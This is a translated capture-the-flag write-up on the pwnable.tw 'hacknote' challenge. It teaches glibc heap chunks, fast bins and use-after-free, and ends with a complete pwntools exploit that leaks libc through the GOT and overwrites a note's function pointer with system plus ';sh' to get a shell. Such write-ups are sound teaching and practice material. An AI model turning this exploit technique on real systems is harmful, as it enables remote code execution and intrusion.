pwnable.tw beginner write-up (4): hacknote, Use After Free

2020-05-08 22:53:27 Author: bbs.pediy.com

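Previous posts

pwnable.tw beginner write-up (1)
pwnable.tw beginner write-up (2): 3×17, hijacking fini_array in a statically linked x64 binary
pwnable.tw beginner write-up (3): dubblesort, stack overflow under multiple protections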

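Prerequisites

If you have never done a heap challenge, or are still unclear about chunks and fast bins, read this first: 《glibc内存管理ptmalloc源代码分析.pdf》 (a source-code analysis of glibc's ptmalloc memory management) by 华庭. I will upload the file as an attachment.

The actual size of a chunk differs from the size you request

Every block of memory we obtain through malloc or similar functions is represented by ptmalloc as a chunk. Freed memory is not handed straight back to the operating system either; it is still managed as a chunk. A chunk therefore has two different layouts, one while in use and one after being freed. First, a chunk in use: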

  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of previous chunk, if unallocated (P clear)  |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of chunk, in bytes                     |A|M|P|
    mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             User data starts here...                          .
          .                                                               .
          .             (malloc_usable_size() bytes)                      .
  next    .                                                               |
  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             (size of chunk, but used for application data)    |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of next chunk, in bytes                |A|0|1|
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

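The first two fields (prev_size and size, 4 bytes each on a 32-bit system) form the chunk header. The memory we requested starts at the third field, where the mem pointer points; its usable size is at least the size we asked for, and the return value of malloc is the value of mem. Now look at a freed chunk: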

  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of previous chunk, if unallocated (P clear)  |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  `head:' |             Size of chunk, in bytes                     |A|0|P|
    mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Forward pointer to next chunk in list             |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Back pointer to previous chunk in list            |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Unused space (may be 0 bytes long)                .
          .                                                               .
   next   .                                                               |
  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  `foot:' |             Size of chunk, in bytes                           |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of next chunk, in bytes                |A|0|0|
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

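The user data area is now occupied by two pointers: fd points to the next chunk in the free list and bk points to the previous one (fast bins are singly linked and use only fd). A chunk in a large bin carries two more pointers, which are not covered here.

Now that we know how a chunk is laid out, how do we work out the real chunk size from the size we request? Take a 32-bit system as an example. A freed chunk has four fields, prev_size, size, fd and bk, which is 16 bytes, so a chunk can never be smaller than 16 bytes. A chunk in use is different: because it is in use, the prev_size field of the next chunk is meaningless, so the current chunk may use that space as well.

This gives in_use_size = (requested size + 8 - 4) aligned up to 8 bytes. Reading left to right: the requested size is what we pass to malloc; +8 accounts for the two header fields; -4 is there because the current chunk can borrow the next chunk's prev_size, saving 4 bytes; and the 8-byte alignment is a ptmalloc requirement.

So the size finally allocated is chunk_size = max(in_use_size, 16). For example, malloc(8) yields a 16-byte chunk and malloc(16) a 24-byte chunk. The sizes mentioned below and in the exp are these final chunk sizes.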
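
The formula above can be written as a small helper. This is only a sketch of the rule as stated in this post, not glibc's actual code; the name `chunk_size` and the `size_sz` parameter (the word size, 4 on i386) are my own choices for illustration.

```python
def chunk_size(request, size_sz=4):
    """Chunk size for a malloc(request), following the rule described above.

    size_sz is the size of one header field: 4 on i386, 8 on x86-64.
    """
    align = 2 * size_sz       # chunks are aligned to two words (8 bytes on i386)
    min_size = 4 * size_sz    # prev_size + size + fd + bk (16 bytes on i386)
    # request + 2 header fields - borrowed prev_size == request + size_sz,
    # then round up to the alignment.
    in_use = (request + size_sz + align - 1) & ~(align - 1)
    return max(in_use, min_size)


for req in (8, 10, 16):
    print(req, "->", chunk_size(req))
```

With `size_sz=8` the same rule gives 0x210 for `malloc(512)`, which matches the distance between the two 64-bit addresses in the first-fit example later in this post.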

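A brief introduction to Fast Bins

glibc keeps each fast bin as a singly linked list and serves it LIFO, like a stack: the most recently freed chunk is handed out first. Chunks of different sizes are never linked into the same bin; there are 10 fast bins, one per chunk size, starting at 16 bytes.
First fit in glibc: in the textbook algorithm, free regions are linked in order of increasing address and an allocation scans them in order, taking the first one that is large enough.

If a free chunk at least as large as the request exists when memory is allocated, glibc picks that chunk. For example: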
```
  a = malloc(512) = 0x2490010
  b = malloc(256) = 0x2490220
  free(a)
  c = malloc(500) = 0x2490010
```
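
The LIFO behaviour of fast bins described above can be pictured with a toy model. This is an illustration only, assuming one stack per chunk size; `ToyFastBins` is a made-up class, not glibc code, and real glibc falls through to other bins when a fast bin is empty.

```python
from collections import defaultdict


class ToyFastBins:
    """Toy model: one LIFO list per chunk size."""

    def __init__(self):
        self.bins = defaultdict(list)   # chunk size -> stack of freed chunk names

    def free(self, name, size):
        self.bins[size].append(name)    # push onto the head of that size's list

    def malloc(self, size):
        bin_ = self.bins[size]
        # Pop the most recently freed chunk; None stands for "not served by a fast bin".
        return bin_.pop() if bin_ else None


fb = ToyFastBins()
fb.free("A", 16)
fb.free("B", 16)
fb.free("C", 24)        # different size, goes to a different bin
first = fb.malloc(16)   # "B": freed last, returned first
second = fb.malloc(16)  # "A"
third = fb.malloc(16)   # None: the 16-byte bin is empty, "C" is never used for it
print(first, second, third)
```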
Use After Free

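After a block of memory is freed, the pointer that refers to it should be set to 0; otherwise it becomes a dangerous dangling pointer. Once the block is handed out again (for example through the first-fit behaviour just described), we can still operate on its contents through the stale pointer. If we craft the data and then use the dangling pointer once more, the result can be an arbitrary address read or write.

The challenge: hacknote

Check the protections first: only NX and Canary are enabled (RELRO is partial and there is no PIE).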

  [0] % checksec hacknote
  [*] '/home/dylan/ctfs/pwnable_tw/hacknote/hacknote'
      Arch:     i386-32-little
      RELRO:    Partial RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      No PIE

Analyse the program structure in IDA; it is quite short.

  void __cdecl __noreturn main()
  {
    int choice_int; // eax
    char choice_char; // [esp+8h] [ebp-10h]
    unsigned int canary; // [esp+Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
    while ( 1 )
    {
      while ( 1 )
      {
        ui_func();
        read(0, &choice_char, 4u);
        choice_int = atoi(&choice_char);
        if ( choice_int != 2 )
          break;
        delete_func();
      }
      if ( choice_int > 2 )
      {
        if ( choice_int == 3 )
        {
          show_func();
        }
        else
        {
          if ( choice_int == 4 )
            exit(0);
  LABEL_13:
          puts("Invalid choice");
        }
      }
      else
      {
        if ( choice_int != 1 )
          goto LABEL_13;
        add_func();
      }
    }
  }

There is not much to say about main. It is a typical heap challenge: it prints a menu and offers creating, deleting and printing notes. Start with add_func:

  unsigned int add_func()
  {
    manage_note *note; // ebx
    signed int i; // [esp+Ch] [ebp-1Ch]
    int size; // [esp+10h] [ebp-18h]
    char buf; // [esp+14h] [ebp-14h]
    unsigned int canary; // [esp+1Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    if ( chunk_count <= 5 )
    {
      for ( i = 0; i <= 4; ++i )
      {
        if ( !chunk_ptr[i] )
        {
          chunk_ptr[i] = malloc(8u);
          if ( !chunk_ptr[i] )
          {
            puts("Alloca Error");
            exit(-1);
          }
          *(_DWORD *)chunk_ptr[i] = puts_func;
          printf("Note size :");
          read(0, &buf, 8u);
          size = atoi(&buf);
          note = (manage_note *)chunk_ptr[i];
          note->content_ptr = (int *)malloc(size);
          if ( !*((_DWORD *)chunk_ptr[i] + 1) )
          {
            puts("Alloca Error");
            exit(-1);
          }
          printf("Content :");
          read(0, *((void **)chunk_ptr[i] + 1), size);
          puts("Success !");
          ++chunk_count;
          return __readgsdword(0x14u) ^ canary;
        }
      }
    }
    else
    {
      puts("Full");
    }
    return __readgsdword(0x14u) ^ canary;
  }

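chunk_count limits how many times add can be used. When a note is created, the program first allocates 8 bytes and stores the address in chunk_ptr[]. These 8 bytes hold the note structure. The first four bytes hold a pointer to a function that I named puts_func; it prints the string referenced by the pointer stored at the next 4-byte offset of the address it is given: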

  int __cdecl puts_func(int *a1)
  {
    return puts((const char *)a1[1]);
  }

The last four bytes hold a pointer to a buffer of size bytes that stores the note's content. That may not be very intuitive, so here is the note structure in C:

  struct manage_note
  {
    int *puts_func_ptr;
    int *content_ptr;
  };

puts_func_ptr points to the function puts_func, and content_ptr points to the note's content, which stores our input. If that is still not clear, here is a diagram:

              note
     +-----------------+                    +----------------+   
     |  *puts_func_ptr |------------------->|    puts_func   |         
     +-----------------+                    +----------------+   
     |  *content_ptr   |------------------->+----------------+
     +-----------------+                    |     real       |
                                            |    content     |
                                            +----------------+
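
To make the 8-byte layout concrete, the sketch below packs a note the way it sits in memory on i386: two little-endian 32-bit pointers. The helper names `pack_note` and `unpack_note` and the heap address `CONTENT` are hypothetical and used only for illustration; `0x0804862B` is the puts_func address that appears in the exp.

```python
import struct


def pack_note(puts_func_ptr, content_ptr):
    """Return the 8 raw bytes of a manage_note on i386 (little-endian)."""
    return struct.pack("<II", puts_func_ptr, content_ptr)


def unpack_note(raw):
    """Split the first 8 bytes back into (puts_func_ptr, content_ptr)."""
    return struct.unpack("<II", raw[:8])


PUTS_FUNC = 0x0804862B   # address of puts_func, as used in the exp
CONTENT = 0x0804B018     # hypothetical heap address, for illustration only

raw = pack_note(PUTS_FUNC, CONTENT)
print(raw.hex())
print([hex(v) for v in unpack_note(raw)])
```

Anything that lets us write 8 bytes of our choosing over a note therefore controls both the function that show_func calls and the pointer that puts_func dereferences.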

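That should be clear now. Suppose we create a note whose size is 10 bytes: the program first allocates 8 bytes for the note structure, then calls malloc(10), which yields a 0x10-byte chunk, as real_content to hold our input. Next, delete_func: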

  unsigned int delete_func()
  {
    int index; // [esp+4h] [ebp-14h]
    char buf; // [esp+8h] [ebp-10h]
    unsigned int canary; // [esp+Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    printf("Index :");
    read(0, &buf, 4u);
    index = atoi(&buf);
    if ( index < 0 || index >= chunk_count )
    {
      puts("Out of bound!");
      _exit(0);
    }
    if ( chunk_ptr[index] )                       // UAF
    {
      free(*((void **)chunk_ptr[index] + 1));
      free(chunk_ptr[index]);
      puts("Success");
    }
    return __readgsdword(0x14u) ^ canary;
  }

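delete_func reads an index and frees the corresponding note. The two free calls are easy to mix up: the first frees our real_content and the second frees the note structure. Neither pointer is set to 0 afterwards, which leaves two dangling pointers, and we can keep operating on the freed memory through them. This is the UAF.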

  unsigned int show_func()
  {
    int index; // [esp+4h] [ebp-14h]
    char buf; // [esp+8h] [ebp-10h]
    unsigned int canary; // [esp+Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    printf("Index :");
    read(0, &buf, 4u);
    index = atoi(&buf);
    if ( index < 0 || index >= chunk_count )
    {
      puts("Out of bound!");
      _exit(0);
    }
    if ( chunk_ptr[index] )
      (*(void (__cdecl **)(void *))chunk_ptr[index])(chunk_ptr[index]);
    return __readgsdword(0x14u) ^ canary;
  }

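show_func reads an index and then calls the function stored at *chunk_ptr[index], that is, the puts_func described above, with chunk_ptr[index] as the argument. Since puts_func actually prints what the next 4-byte slot of its argument points to, namely note->content_ptr, our content is printed.

Exploitation plan
- The only vulnerability is the UAF in delete_func. Even after a note has been deleted, show_func still calls whatever puts_func_ptr points to. If we can change puts_func_ptr, we hijack the program's control flow. How to change it is explained in the exp; for now, assume we can.
- The program has no backdoor function, and a libc.so is provided, so we first need to leak the address where libc is loaded and then compute the addresses of system and '/bin/sh'. Since we can already overwrite both pointers in a note, pointing content_ptr at a GOT entry (the exp uses got['malloc']) and showing the note leaks a libc address, from which the base follows.
- From the libc base we compute the address of system, then overwrite a note's puts_func_ptr again to call system. Setting up the argument for system has a catch. Recall show_func: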
```
    if ( chunk_ptr[index] )
      (*chunk_ptr[index])(chunk_ptr[index]);
```
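  At this point chunk_ptr[index] holds the note pointer, and *chunk_ptr[index] is note->puts_func_ptr, so system is called as intended. The argument, however, is that same note pointer. puts_func adds the 4-byte offset itself, which is why it prints the content correctly; system applies no offset, so this call is not system('/bin/sh').
  
  Instead we can craft the bytes of the note itself. When the note is passed as the command string, its first four bytes (the address of system) are not a command the shell recognises, but if the last four bytes start with a ';', whatever follows runs as a separate command. For example: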
```
  (ssh) dylan@eureka-pwn : ~/ctfs/pwnable_tw/hacknote
  [0] % fuck;ls
  zsh: command not found: fuck
  core  hacknote  hack.py  libc.so
```
  Back to the challenge: the bytes of the system address are not a valid command, but adding sh after the semicolon gets us a shell.
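
The arithmetic behind the last two steps can be sketched as follows. The offsets and the leaked value are invented for illustration and are not taken from the challenge's libc; the helper names `libc_addresses` and `system_payload` are also my own. In the real exp the offsets come from the provided libc.so.

```python
import struct


def libc_addresses(leaked_malloc, malloc_off, system_off):
    """Derive the libc base and the address of system from a leaked malloc address."""
    libc_base = leaked_malloc - malloc_off
    return libc_base, libc_base + system_off


def system_payload(system_addr):
    # show_func calls note->puts_func_ptr(note), so system() receives a pointer
    # to these 8 bytes and treats them as a command line: "<4 address bytes>;sh".
    return struct.pack("<I", system_addr) + b";sh\x00"


# Hypothetical numbers, for illustration only.
MALLOC_OFF, SYSTEM_OFF = 0x70AB0, 0x3A940
base, system_addr = libc_addresses(0xF7570AB0, MALLOC_OFF, SYSTEM_OFF)
payload = system_payload(system_addr)

print(hex(base), hex(system_addr), payload)
```

Because the payload is read as a C string, this trick only works when none of the four address bytes is a NUL byte; a quick sanity check on the leak is that the computed base is page aligned (its low 12 bits are zero).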

exp

  #!/usr/bin/env python2
  # -*- coding: utf-8 -*-
  from PwnContext.core import *
  local = False

  # Set up pwntools for the correct architecture
  exe = './' + 'hacknote'
  elf = context.binary = ELF(exe)
  ctx.custom_lib_dir = '/home/dylan/glibc-all-in-one/libs/2.23-0ubuntu10_i386'

  #don't forget to change it
  host = args.HOST or 'chall.pwnable.tw'
  port = int(args.PORT or 10102)

  #don't forget to change it
  #ctx.binary = './' + 'hacknote'
  ctx.binary = exe
  libc = args.LIBC or 'libc.so'
  elf_libc = ELF(libc)
  ctx.debug_remote_libc = True
  ctx.remote_libc = libc
  if local:
      context.log_level = 'debug'
      try:
          io = ctx.start()
      except Exception as e:
          print(e.args)
          print("It can't work,may be it can't load the remote libc!")
          print("It will load the local process")
          io = process(exe)
  else:
      io = remote(host,port)
  #===========================================================
  #                    EXPLOIT GOES HERE
  #===========================================================

  # Arch:     i386-32-little
  # RELRO:    Partial RELRO
  # Stack:    Canary found
  # NX:       NX enabled
  # PIE:      No PIE (0x8048000)
  def add(size,content):
      io.recvuntil('Your choice :')
      io.send(str(1))
      io.recvuntil(':')
      io.send(str(size))
      io.recvuntil('Content :')
      io.send(content)

  def delete(index):
      io.recvuntil('Your choice :')
      io.send(str(2))
      io.recvuntil('Index :')
      io.send(str(index))

  def show(index):
      io.recvuntil('Your choice :')
      io.send(str(3))
      io.recvuntil('Index :')
      io.send(str(index))

  def exp():
      puts_func_addr = 0x0804862B

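      # Create two notes whose real_content size is 16
      # This actually allocates four chunks: two 16-byte chunks for the note structures and two 24-byte chunks for real_content
      # If it is unclear why they are 16 and 24 bytes, see the chunk size calculation in the prerequisites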
      add(16,'a'*16) # note 0
      add(16,'a'*16) # note 1

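      # Free note 0 and then note 1
      # As above, this frees four chunks, all of which go into the fast bins
      # The two 24-byte chunks are linked together (real_content_1 -> real_content_0); they are no longer needed, forget about them
      # What matters is that the two 16-byte chunks are linked together: note_1 -> note_0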
      delete(0)
      delete(1)

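      # Now create a note of size 8, which mallocs two 16-byte chunks
      # First the program mallocs a 16-byte chunk for the note structure; by first fit and the LIFO behaviour of fast bins,
      # note_2 gets the chunk that used to be note_1
      # Then the program mallocs another 16-byte chunk as real_content for our input
      # real_content_2 is therefore the chunk that used to be note_0, and we control what is written to it
      # Writing to real_content_2 overwrites the two pointers stored in note_0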

      add(8,p32(puts_func_addr) + p32(elf.got['malloc']))

      # Calling puts_func through note 0 prints the value stored at elf.got['malloc'], which leaks a libc address
      show(0)

      # Compute the remaining addresses from the leak
      malloc_got = u32(io.recvn(4)[:4])
      log.success("malloc_got = " + hex(malloc_got))

      libc_base = malloc_got - elf_libc.symbols['malloc']
      log.success("libc_base = " + hex(libc_base))

      system_addr = libc_base + elf_libc.symbols['system']
      log.success("system_addr = " + hex(system_addr))

      bin_sh_addr = libc_base + elf_libc.search('/bin/sh\x00').next()
      log.success("bin_sh_addr = " + hex(bin_sh_addr))

      # Free note_2; the fast bin returns to the state note_1 -> note_0
      delete(2)

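      # The new note's real_content overlaps note_0 again, so note_0->puts_func_ptr == system_addr
      # system() receives the note itself as its argument: p32(system_addr) + ';sh\x00'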
      add(8,p32(system_addr) + ';sh\x00')

      # getshell
      show(0)

  if __name__ == '__main__':
      exp()
      io.interactive()
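
The chunk reuse that the comments in the exp describe can be traced with a toy model. This is a simplified sketch: it assumes every request is served either from a fast bin or from a fresh chunk, and it ignores chunk_count and the menu. `ToyHacknote` and its methods are hypothetical names, not part of the challenge.

```python
from collections import defaultdict


def chunk_size(request):
    # i386 rule from the prerequisites: (request + 8 - 4) aligned to 8, at least 16
    return max((request + 4 + 7) & ~7, 16)


class ToyHacknote:
    def __init__(self):
        self.bins = defaultdict(list)  # fast bins: chunk size -> LIFO stack of chunk ids
        self.sizes = {}                # chunk id -> chunk size
        self.next_id = 0
        self.notes = []                # models chunk_ptr[]: entries are never cleared

    def _malloc(self, request):
        size = chunk_size(request)
        if self.bins[size]:
            return self.bins[size].pop()   # reuse the most recently freed chunk
        cid = self.next_id                 # otherwise hand out a fresh chunk
        self.next_id += 1
        self.sizes[cid] = size
        return cid

    def _free(self, cid):
        self.bins[self.sizes[cid]].append(cid)

    def add(self, content_size):
        note = self._malloc(8)             # note structure first
        content = self._malloc(content_size)
        self.notes.append((note, content))
        return len(self.notes) - 1

    def delete(self, index):
        note, content = self.notes[index]
        self._free(content)                # same order as delete_func
        self._free(note)                   # the entry stays in self.notes: dangling


h = ToyHacknote()
h.add(16)       # note 0
h.add(16)       # note 1
h.delete(0)
h.delete(1)
h.add(8)        # note 2: its content chunk is note 0's structure chunk
h.delete(2)
h.add(8)        # note 3: overlaps note 0 again
for i, (note, content) in enumerate(h.notes):
    print("note", i, "struct chunk", note, "content chunk", content)
```

In this model the content chunk of notes 2 and 3 is the same chunk as the structure of note 0, which is why writing the content of the new note rewrites the two pointers that show(0) uses.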

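PS: If your IDA decompilation looks different from mine, that is because I renamed variables, changed function types and created a note struct. It should not make much difference.

About me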

blog:https://0x2l.github.io/

Source: https://bbs.pediy.com/thread-259371.htm